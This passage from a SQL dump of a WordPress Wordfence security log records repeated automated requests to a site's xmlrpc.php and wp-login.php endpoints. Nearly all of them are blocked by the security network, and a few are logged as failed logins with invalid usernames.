Network',NULL),(9716,0.000000,1630366981.001595,'\0\0\0\0\0\0\0\0\0\0���O�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9717,0.000000,1630367262.088386,'\0\0\0\0\0\0\0\0\0\0��\'gI�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9718,0.000000,1630367571.544435,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9719,0.000000,1630367869.056162,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9720,0.000000,1630367937.274172,'\0\0\0\0\0\0\0\0\0\0��_�',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9721,0.000000,1630368174.077111,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9722,0.000000,1630368438.784223,'\0\0\0\0\0\0\0\0\0\0���@tA',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9723,0.000000,1630368747.328699,'\0\0\0\0\0\0\0\0\0\0��]��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9724,0.000000,1630369077.670150,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9725,0.000000,1630369378.120987,'\0\0\0\0\0\0\0\0\0\0����&�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9726,0.000000,1630369533.091330,'\0\0\0\0\0\0\0\0\0\0��QX4\Z',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9727,0.000000,1630369678.060723,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9728,0.000000,1630369981.853721,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9729,0.000000,1630370285.885497,'\0\0\0\0\0\0\0\0\0\0��Q���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9730,0.000000,1630371121.200178,'\0\0\0\0\0\0\0\0\0\0��6�%�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9731,0.000000,1630371549.363449,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9732,0.000000,1630372176.669433,'\0\0\0\0\0\0\0\0\0\0��g��8',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9733,0.000000,1630372496.225105,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9734,0.000000,1630372707.918956,'\0\0\0\0\0\0\0\0\0\0����\"E',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9735,0.000000,1630372783.763754,'\0\0\0\0\0\0\0\0\0\0��4�@�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9736,0.000000,1630373108.583303,'\0\0\0\0\0\0\0\0\0\0��D���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9737,0.000000,1630373451.829011,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9738,0.000000,1630373804.439230,'\0\0\0\0\0\0\0\0\0\0���_nq',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9739,0.000000,1630374125.754303,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9740,0.000000,1630374302.653902,'\0\0\0\0\0\0\0\0\0\0��/sM�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9741,0.000000,1630374492.335452,'\0\0\0\0\0\0\0\0\0\0��`>w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9742,0.000000,1630374737.375731,'\0\0\0\0\0\0\0\0\0\0����)�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9743,0.000000,1630375083.865929,'\0\0\0\0\0\0\0\0\0\0��#�D',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9744,0.000000,1630375419.433386,'\0\0\0\0\0\0\0\0\0\0��v',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9745,0.000000,1630375757.538063,'\0\0\0\0\0\0\0\0\0\0���@u�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9746,0.000000,1630375908.447537,'\0\0\0\0\0\0\0\0\0\0����^�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9747,0.000000,1630376130.741736,'\0\0\0\0\0\0\0\0\0\0���zR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9748,0.000000,1630376435.586777,'\0\0\0\0\0\0\0\0\0\0��ge+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9749,0.000000,1630376828.001318,'\0\0\0\0\0\0\0\0\0\0��w`�;',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9750,0.000000,1630377152.479820,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9751,0.000000,1630377471.836267,'\0\0\0\0\0\0\0\0\0\0���AA�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9752,0.000000,1630377518.026130,'\0\0\0\0\0\0\0\0\0\0���]n\'',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9753,0.000000,1630377847.171335,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9754,0.000000,1630378212.879001,'\0\0\0\0\0\0\0\0\0\0��6\'�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9755,0.000000,1630378495.123101,'\0\0\0\0\0\0\0\0\0\0��P�i',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9756,0.000000,1630378552.500779,'\0\0\0\0\0\0\0\0\0\0��@om�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9757,0.000000,1630378865.288324,'\0\0\0\0\0\0\0\0\0\0��+�Ԟ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9758,0.000000,1630379305.497345,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9759,0.000000,1630379608.650754,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9760,0.000000,1630379967.743561,'\0\0\0\0\0\0\0\0\0\0���5�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9761,0.000000,1630380324.737629,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9762,0.000000,1630380680.518386,'\0\0\0\0\0\0\0\0\0\0��R�5�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9763,0.000000,1630380761.822606,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9764,0.000000,1630381051.445810,'\0\0\0\0\0\0\0\0\0\0��Y���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9765,0.000000,1630381415.002035,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9766,0.000000,1630382135.582950,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9767,0.000000,1630382376.646742,'\0\0\0\0\0\0\0\0\0\0��_o�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9768,0.000000,1630382510.570367,'\0\0\0\0\0\0\0\0\0\0���[a�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9769,0.000000,1630382877.036439,'\0\0\0\0\0\0\0\0\0\0��E���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9770,0.000000,1630383244.129931,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9771,0.000000,1630383593.805864,'\0\0\0\0\0\0\0\0\0\0��=o�$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9772,0.000000,1630383997.362495,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9773,0.000000,1630384006.433648,'\0\0\0\0\0\0\0\0\0\0��ܧe',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9774,0.000000,1630384380.913410,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9775,1630384789.681101,1630384789.270400,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(9776,0.000000,1630385197.083859,'\0\0\0\0\0\0\0\0\0\0��>q�1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9777,0.000000,1630385613.000909,'\0\0\0\0\0\0\0\0\0\0����E',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9778,0.000000,1630385653.406342,'\0\0\0\0\0\0\0\0\0\0��E�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9779,0.000000,1630386030.410197,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9780,0.000000,1630386447.474541,'\0\0\0\0\0\0\0\0\0\0��g�|�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9781,0.000000,1630386842.667772,'\0\0\0\0\0\0\0\0\0\0��.V<�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9782,0.000000,1630387287.928847,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9783,0.000000,1630387293.314469,'\0\0\0\0\0\0\0\0\0\0��h�*d',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9784,0.000000,1630387769.621187,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9785,0.000000,1630388138.677682,'\0\0\0\0\0\0\0\0\0\0����kQ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9786,0.000000,1630388607.291524,'\0\0\0\0\0\0\0\0\0\0���Z7:',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9787,0.000000,1630388909.821160,'\0\0\0\0\0\0\0\0\0\0��N/ɏ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9788,0.000000,1630389031.986581,'\0\0\0\0\0\0\0\0\0\0����T',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9789,0.000000,1630389344.766198,'\0\0\0\0\0\0\0\0\0\0��.V<�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9790,0.000000,1630389661.821740,'\0\0\0\0\0\0\0\0\0\0��\"Q�n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9791,0.000000,1630389956.172649,'\0\0\0\0\0\0\0\0\0\0��/[+�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9792,0.000000,1630390206.855312,'\0\0\0\0\0\0\0\0\0\0��\r$n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9793,0.000000,1630390435.448536,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9794,0.000000,1630390506.499418,'\0\0\0\0\0\0\0\0\0\0��=��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9795,0.000000,1630390627.017284,'\0\0\0\0\0\0\0\0\0\0��x�@',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9796,0.000000,1630390876.145606,'\0\0\0\0\0\0\0\0\0\0��Ո]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9797,0.000000,1630391054.981723,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9798,0.000000,1630391247.797592,'\0\0\0\0\0\0\0\0\0\0��g���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9799,0.000000,1630391445.825391,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9800,0.000000,1630391626.774257,'\0\0\0\0\0\0\0\0\0\0��#���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9801,0.000000,1630391804.166789,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9802,0.000000,1630393043.808999,'\0\0\0\0\0\0\0\0\0\0���S��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9803,0.000000,1630393298.751232,'\0\0\0\0\0\0\0\0\0\0��=C�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9804,0.000000,1630393427.244415,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9805,0.000000,1630393580.527030,'\0\0\0\0\0\0\0\0\0\0�����$',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9806,0.000000,1630393601.819376,'\0\0\0\0\0\0\0\0\0\0����e�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9807,0.000000,1630393774.777248,'\0\0\0\0\0\0\0\0\0\0���� ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 